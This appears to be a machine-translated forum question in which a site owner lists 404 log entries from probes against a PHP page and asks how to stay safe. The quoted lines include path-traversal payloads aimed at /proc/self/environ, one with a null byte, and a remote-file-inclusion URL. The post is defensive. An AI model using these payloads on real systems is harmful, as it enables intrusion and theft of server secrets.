浏览我的404日志时,我注意到以下两个URL,它们两个都发生一次:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
和
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
有问题的页面library.php
需要一个type
具有六个不同可接受值的id
变量,然后是一个变量。因此,有效的网址可能是
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
并且所有ID都必须mysql_real_escape_string
先运行,然后才能用于查询数据库。
我是菜鸟,但在我看来,这两个链接都是针对Webroot的简单攻击?
1)如何最好地防止404以外的其他事情?
2)我应该永久禁止负责的IP吗?
编辑:也只是注意到这一
/library.php=http://www.basfalt.no/scripts/danger.txt
编辑2:所有这3次攻击的违法IP都216.97.231.15
追溯到位于洛杉矶外部的ISP,称为Lunar Pages。
编辑3:我决定在当地时间星期五早上致电ISP,并与可以与我打电话的人讨论这个问题。我将在24小时左右的时间内将结果发布在这里。
编辑4:我最终给他们的管理员发送了电子邮件,他们首先回答说“他们正在调查”,然后一天后回答“现在应该解决此问题”。遗憾的是,没有更多细节。
type
告诉脚本包括要使用的脚本(尽管通过IF $_GET['type'] == 'thing') {} ESLE...
,而不是像一样的直接链接include 'type.php'
),并且脚本id
通过mysql_real_escape_string运行,并用于查询。知道了,我还安全吗?